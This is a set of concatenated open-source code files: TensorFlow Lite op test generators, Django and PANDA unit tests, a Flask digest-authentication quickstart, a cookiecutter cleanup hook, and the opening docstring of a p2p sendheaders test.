while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.unstack(input_tensor, axis=get_valid_axis(parameters))
return [input_tensor], [outs[0]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_range_tests(options):
"""Make a set of tests to do range."""
test_parameters = [{
"dtype": [tf.int32, tf.float32],
"offset": [10, 100, 1000],
"delta": [1, 2, 3, 4, -1, -2, -3, -4],
}]
def build_graph(parameters):
"""Build the range op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"], name=("start"), shape=[])
if parameters["delta"] < 0:
offset = parameters["offset"] * -1
else:
offset = parameters["offset"]
delta = parameters["delta"]
limit_tensor = input_tensor + offset
delta_tensor = tf.constant(delta, dtype=parameters["dtype"])
out = tf.range(input_tensor, limit_tensor, delta_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_scalar_data(parameters["dtype"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fill_tests(options):
"""Make a set of tests to do fill."""
test_parameters = [{
"dims_dtype": [tf.int32, tf.int64],
"dims_shape": [[], [1], [3], [3, 3]],
"value_dtype": [tf.int32, tf.int64, tf.float32],
}]
def build_graph(parameters):
"""Build the fill op testing graph."""
input1 = tf.placeholder(
dtype=parameters["dims_dtype"],
name="dims",
shape=parameters["dims_shape"])
input2 = tf.placeholder(
dtype=parameters["value_dtype"], name="value", shape=[])
out = tf.fill(input1, input2)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input1 = create_tensor_data(parameters["dims_dtype"],
parameters["dims_shape"], 1)
input2 = create_scalar_data(parameters["value_dtype"])
return [input1, input2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input1, input2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
def _make_logical_tests(op):
"""Make a set of tests to do logical operations."""
def logical(options, expected_tf_failures=0):
"""Generate examples."""
test_parameters = [{
"input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the logical testing graph."""
input_value1 = tf.placeholder(
dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
out = op(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return logical
@register_make_test_function()
def make_logical_or_tests(options):
"""Make a set of tests to do logical_or."""
return _make_logical_tests(tf.logical_or)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
"""Make a set of tests to do logical_and."""
return _make_logical_tests(tf.logical_and)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
"""Make a set of tests to do logical_xor.
Test logical_not as well.
"""
return _make_logical_tests(tf.logical_xor)(options, expected_tf_failures=1)
@register_make_test_function()
def make_mirror_pad_tests(options):
"""Make a set of tests to do mirror_pad."""
test_parameters = [
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [1, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["const"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[3, 2, 4, 5]],
"padding_matrix": [[[1, 1], [2, 2], [1, 1], [1, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["type"] != "const":
padding_matrix = tf.placeholder(
dtype=tf.int32,
name="padding",
shape=[len(parameters["input_shape"]), 2])
input_tensors = [input_tensor, padding_matrix]
else:
padding_matrix = tf.constant(np.array(parameters["padding_matrix"]))
input_tensors = [input_tensor]
output = tf.pad(
input_tensor, paddings=padding_matrix, mode=parameters["mode"])
return input_tensors, [output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
if parameters["type"] != "const":
input_values.append(np.array(parameters["padding_matrix"]))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unroll_batch_matmul_tests(options):
"""Make a set of tests to test unroll_batch_matmul."""
  # The test cases below require broadcasting support (BatchMatMulV2
  # semantics), which isn't supported as of this change.
broadcast_shape_params = [
# Simple broadcast.
[(1, 2, 3), (3, 5), False, False],
# Empty batch broadcast.
[(2, 5, 3), (3, 7), False, False],
# Single batch with non-empty batch broadcast.
[(1, 5, 3), (4, 3, 7), False, False],
# Broadcast both operands
[(3, 1, 5, 3), (1, 4, 3, 7), False, False],
]
test_parameters = [{
"dtype": [tf.float32],
"shape": [
[(2, 2, 3), (2, 3, 2), False, False],
[(2, 2, 3), (2, 3, 2), True, True],
[(2, 2, 3), (2, 2, 3), False, True],
[(2, 2, 3), (2, 2, 3), True, False],
[(4, 2, 2, 3), (4, 2, 3, 2), False, False],
[(4, 2, 2, 3), (4, 2, 3, 2), True, True],
[(4, 2, 2, 3), (4, 2, 2, 3), False, True],
[(4, 2, 2, 3), (4, 2, 2, 3), True, False]
] + broadcast_shape_params,
      # TODO(b/130887442): Improve the forward compatibility tests for every
      # op.
"forward_compatibility_test": [False, True],
}]
def build_graph(parameters):
"""Build the batch_matmul op testing graph."""
def _build_graph():
input_tensor1 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][0])
input_tensor2 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][1])
# Should be unrolled and replaced with fully_connected ops in the end.
out = tf.matmul(
input_tensor1,
input_tensor2,
transpose_a=parameters["shape"][2],
transpose_b=parameters["shape"][3])
return [input_tensor1, input_tensor2], [out]
if parameters["forward_compatibility_test"]:
# This is hardcoded to the date after MatMulV2 is activated.
    # TODO(b/130887442): Improve the forward compatibility tests for every
    # op, and remove the hardcoded date.
with tf.compat.forward_compatibility_horizon(2019, 4, 26):
return _build_graph()
else:
return _build_graph()
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][0])
input_value2 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_placeholder_with_default_tests(options):
"""Make a set of tests to test placeholder_with_default."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the placeholder_with_default testing graph."""
const_node = tf.constant(
[1, 2, 2, 0], shape=[2, 2], dtype=parameters["dtype"])
input_tensor = tf.placeholder_with_default(
const_node, shape=[2, 2], name="input")
out = tf.equal(input_tensor, const_node, name="output")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
numpy_type = _TF_TYPE_INFO[parameters["dtype"]][0]
input_value = np.array([[1, 0], [2, 1]], numpy_type)
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unique_tests(options):
"""Make a set of tests for Unique op."""
test_parameters = [
{
"input_shape": [[1]],
"index_type": [tf.int32, tf.int64, None],
"input_values": [3]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 2, 3]]
},
{
"input_shape": [[7]],
"index_type": [tf.int32, tf.int64],
"input_values": [[1, 1, 1, 1, 1, 1, 1]]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 0, -1]]
}]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["index_type"] is None:
output = tf.unique(input_tensor)
else:
output = tf.unique(input_tensor, parameters["index_type"])
return [input_tensor], output
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_v2_tests(options):
"""Make a set of tests to do reverse_v2."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.reverse(input_tensor, axis=[get_valid_axis(parameters)])
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_sequence_tests(options):
"""Make a set of tests to do reverse_sequence."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[8, 4, 5, 5, 6], [4, 4, 3, 5]],
"seq_lengths": [[2, 2, 2, 2], [2, 1, 1, 0]],
"seq_axis": [0, 3],
"batch_axis": [1]
},
{
"input_dtype": [tf.float32],
"input_shape": [[2, 4, 5, 5, 6]],
"seq_lengths": [[2, 1]],
"seq_axis": [2],
"batch_axis": [0]
},
{
"input_dtype": [tf.float32],
"input_shape": [[4, 2]],
"seq_lengths": [[3, 1]],
"seq_axis": [0],
"batch_axis": [1]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.reverse_sequence(
input_value,
seq_lengths=parameters["seq_lengths"],
batch_axis=parameters["batch_axis"],
seq_axis=parameters["seq_axis"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_diag_tests(options):
"""Make a set of tests for tf.linalg.diag op."""
test_parameters = [
{
"input_shape": [[3], [2, 3], [3, 4, 5], [2, 4, 6, 8]],
"input_dtype": [tf.int32, tf.float32],
},
]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.matrix_diag(input_tensor)
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_set_diag_tests(options):
"""Make a set of tests for tf.linalg.set_diag op."""
test_parameters = [
{
"input_diag_shapes": [([3, 3], [3]), ([2, 3], [2]), ([2, 4, 4],
[2, 4]),
([3, 4, 5, 6], [3, 4, 5])],
"input_dtype": [tf.int32, tf.float32, tf.uint8],
},
]
def build_graph(parameters):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="input", shape=input_shape)
diag_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="diagonal", shape=diag_shape)
outs = tf.matrix_set_diag(input_tensor, diag_tensor)
return [input_tensor, diag_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_values = create_tensor_data(parameters["input_dtype"], input_shape)
diag_values = create_tensor_data(parameters["input_dtype"], diag_shape)
return [input_values, diag_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values, diag_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_eye_tests(options):
"""Make a set of tests for tf.eye op."""
test_parameters = [{
"num_rows_shape": [[]],
"num_cols_shape": [[]],
"batch_shape": [[3], [2, 4], [4, 5, 6], None],
"use_num_cols": [True, False],
"dtype": [tf.float32, tf.int32],
}]
def build_graph(parameters):
input_tensor0 = tf.placeholder(
dtype=tf.int32, name="num_rows", shape=parameters["num_rows_shape"])
input_tensor1 = tf.placeholder(
dtype=tf.int32, name="num_columns", shape=parameters["num_cols_shape"])
if parameters["use_num_cols"]:
outs = tf.eye(
num_rows=input_tensor0,
num_columns=input_tensor1,
batch_shape=parameters["batch_shape"],
dtype=parameters["dtype"])
return [input_tensor0, input_tensor1], [outs]
else:
outs = tf.eye(num_rows=input_tensor0, dtype=parameters["dtype"])
return [input_tensor0], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value0 = create_scalar_data(dtype=np.int32, min_value=1)
input_value1 = create_scalar_data(dtype=np.int32, min_value=1)
if parameters["use_num_cols"]:
return [input_value0, input_value1], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0, input_value1])))
else:
return [input_value0], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_lstm_tests(options):
"""Make a set of tests to do unidirectional_sequence_lstm."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"use_peepholes": [False, True],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"],
use_peepholes=parameters["use_peepholes"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
lstm_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"], use_peepholes=parameters["use_peepholes"])
outs, _ = tf.nn.static_rnn(lstm_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
    # The TFLite fused kernel takes its input as [time, batch, input].
    # For the static unidirectional sequence lstm, the input is an array of
    # length `time` whose elements are packed together; however, for
    # time = 1 the input is not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function(name="make_unidirectional_sequence_rnn_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_rnn_tests(options):
"""Make a set of tests to do unidirectional_sequence_rnn."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
rnn_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.nn.static_rnn(rnn_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
    # The TFLite fused kernel takes its input as [time, batch, input].
    # For the static unidirectional sequence rnn, the input is an array of
    # length `time` whose elements are packed together; however, for
    # time = 1 the input is not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_unfused_gru_tests(options):
"""Make a set of tests for unfused gru op."""
test_parameters = [{
"units": [2, 5],
"batch_size": [1, 2],
"time": [3],
}]
def build_graph(parameters):
inputs = [
tf.placeholder(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
cell_fw = tf.nn.rnn_cell.GRUCell(parameters["units"])
cell_bw = tf.nn.rnn_cell.GRUCell(parameters["units"])
outputs, _, _ = tf.nn.static_bidirectional_rnn(
cell_fw, cell_bw, inputs, dtype=tf.float32)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
init = tf.global_variables_initializer()
sess.run(init)
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
# Toco binary path provided by the generate rule.
bin_path = None
def generate_examples(options):
global bin_path
def mkdir_if_not_exist(x):
if not os.path.isdir(x):
os.mkdir(x)
if not os.path.isdir(x):
raise RuntimeError("Failed to create dir %r" % x)
opstest_path = os.path.join(options.output_path)
mkdir_if_not_exist(opstest_path)
out = options.zip_to_output
bin_path = options.toco
# Some zip filenames contain a postfix identifying the conversion mode. The
# list of valid conversion modes is defined in
# generated_test_conversion_modes() in build_def.bzl.
test_function = ("make_%s_tests" % (out.replace(".zip", "").replace(
"pb2lite", "").replace("toco-flex", "").rstrip("_")))
if test_function not in _MAKE_TEST_FUNCTIONS_MAP:
raise RuntimeError("Can't find a test function to create %r. Tried %r" %
(out, test_function))
_MAKE_TEST_FUNCTIONS_MAP[test_function](options)
| {
"content_hash": "65833289b44bb6110e3008350a384b1b",
"timestamp": "",
"source": "github",
"line_count": 4981,
"max_line_length": 80,
"avg_line_length": 34.391688415980724,
"alnum_prop": 0.5973205685765156,
"repo_name": "ghchinoy/tensorflow",
"id": "42bab6977253db120b3d479fa7876692730a23f8",
"size": "171995",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/lite/testing/generate_examples_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.test.client import RequestFactory, Client
from prescription.models import Pattern
from prescription.views import CreatePatternView
from user.models import HealthProfessional
class TestCreatePattern(TestCase):
def setUp(self):
self.factory = RequestFactory()
self.my_class = Pattern
self.my_view = CreatePatternView()
self.user = HealthProfessional()
self.user.email = 'email@email.com'
self.user.save()
self.name = "Pattern de teste"
self.user_creator = self.user
self.clinic = "clinica de teste"
self.header = "header de teste"
self.font = 'Helvetica'
self.font_size = '12'
self.footer = "footer de teste"
self.pagesize = "letter"
def test_pattern_redirect_valid(self):
data = {
'name': self.name,
'clinic': self.clinic,
'font': 'Helvetica',
'font_size': '12',
'header': self.header,
'footer': self.footer,
'pagesize': self.pagesize,
}
request = self.factory.post('/', data)
request.user = self.user
response = CreatePatternView.as_view()(request)
self.assertEqual(response.status_code, 302)
def test_pattern_get(self):
request = self.factory.get('/prescription/create_prescription_model/')
request.user = self.user
# Get the response
response = self.my_view.get(request)
self.assertEqual(response.status_code, 200)
| {
"content_hash": "637b1c4cfdd5f6e9db13430c69dd5d07",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 78,
"avg_line_length": 30.30188679245283,
"alnum_prop": 0.5990037359900373,
"repo_name": "fga-gpp-mds/2017.2-Receituario-Medico",
"id": "0f813fb84973c2aa233212613aae998ab35e05cb",
"size": "1606",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "medical_prescription/prescription/test/test_view_createpattern.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2123328"
},
{
"name": "CoffeeScript",
"bytes": "102158"
},
{
"name": "HTML",
"bytes": "2703462"
},
{
"name": "JavaScript",
"bytes": "7544427"
},
{
"name": "Makefile",
"bytes": "1369"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PowerShell",
"bytes": "471"
},
{
"name": "Python",
"bytes": "627321"
},
{
"name": "Ruby",
"bytes": "1030"
},
{
"name": "Shell",
"bytes": "3774"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask_digest import Stomach
app = Flask(__name__)
stomach = Stomach('realm')
db = dict()
@stomach.register
def add_user(username, password):
print(username, password)
db[username] = password
@stomach.access
def get_user(username):
return db.get(username, None)
@app.route('/')
@stomach.protect
def main():
return '<h1> resource <h1>'
add_user('admin', '12345')
app.run()
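# Example usage (assuming Flask's default host and port): the protected
# resource can then be fetched with HTTP digest credentials, e.g.
#   curl --digest -u admin:12345 http://127.0.0.1:5000/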
| {
"content_hash": "d7b8d0d7ea69bd39ab2aca820616b8d3",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 33,
"avg_line_length": 17.583333333333332,
"alnum_prop": 0.6848341232227488,
"repo_name": "vctandrade/flask-digest",
"id": "b0e8a3a1b94f63eef5a87d5ce56af4cdc2aab59f",
"size": "422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/quickstart.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5632"
}
],
"symlink_target": ""
} |
import os
import sys
import shutil
use_celery = '{{cookiecutter.use_celery}}'
if use_celery == "no":
base_path = os.getcwd()
app_path = os.path.join(
base_path,
'{{cookiecutter.app_name}}',
)
tasks_path = os.path.join(app_path, 'tasks')
celery_app_path = os.path.join(app_path, 'celery_app.py')
try:
shutil.rmtree(tasks_path)
except Exception:
print("ERROR: cannot delete celery tasks path %s" % tasks_path)
sys.exit(1)
try:
os.remove(celery_app_path)
except Exception:
print("ERROR: cannot delete celery application file")
sys.exit(1)
try:
os.remove(os.path.join(base_path, "tests", "test_celery.py"))
except Exception:
print("ERROR: cannot delete celery tests files")
sys.exit(1)
| {
"content_hash": "2cba0751cc07976bb87b2f702aaf2478",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 71,
"avg_line_length": 24.848484848484848,
"alnum_prop": 0.6036585365853658,
"repo_name": "karec/cookiecutter-flask-restful",
"id": "af2a9bbf593c8f79e84b326368c8afaca68252d1",
"size": "820",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hooks/post_gen_project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "656"
},
{
"name": "Makefile",
"bytes": "1264"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "34296"
}
],
"symlink_target": ""
} |
import os.path
from django.conf import settings
from django.test import TransactionTestCase
from panda.tests import utils
class TestRelatedUpload(TransactionTestCase):
fixtures = ['init_panda.json', 'test_users.json']
def setUp(self):
settings.CELERY_ALWAYS_EAGER = True
self.user = utils.get_panda_user()
self.dataset = utils.get_test_dataset(self.user)
self.upload = utils.get_test_related_upload(self.user, self.dataset)
def test_created(self):
self.assertEqual(self.upload.original_filename, utils.TEST_DATA_FILENAME)
self.assertEqual(self.upload.creator, self.user)
self.assertNotEqual(self.upload.creation_date, None)
self.assertEqual(self.upload.dataset, self.dataset)
def test_delete(self):
path = self.upload.get_path()
self.assertEqual(os.path.isfile(path), True)
self.upload.delete()
self.assertEqual(os.path.exists(path), False)
| {
"content_hash": "71a9a2131c5d138438921f5cde233931",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 81,
"avg_line_length": 30.125,
"alnum_prop": 0.6939834024896265,
"repo_name": "PalmBeachPost/panda",
"id": "1c4ffbaa4b0db6bd96ff2920b25da91789dcf806",
"size": "987",
"binary": false,
"copies": "6",
"ref": "refs/heads/1.2.0",
"path": "panda/tests/test_related_upload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "14837"
},
{
"name": "HTML",
"bytes": "51564"
},
{
"name": "Java",
"bytes": "256"
},
{
"name": "JavaScript",
"bytes": "759191"
},
{
"name": "Python",
"bytes": "877718"
},
{
"name": "Shell",
"bytes": "17522"
}
],
"symlink_target": ""
} |
from test_framework.mininode import *
from test_framework.test_framework import FlurboTestFramework
from test_framework.util import *
from test_framework.blocktools import create_block, create_coinbase
'''
SendHeadersTest -- test behavior of headers messages to announce blocks.
Setup:
- Two nodes, two p2p connections to node0. One p2p connection should only ever
receive inv's (omitted from testing description below, this is our control).
Second node is used for creating reorgs.
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
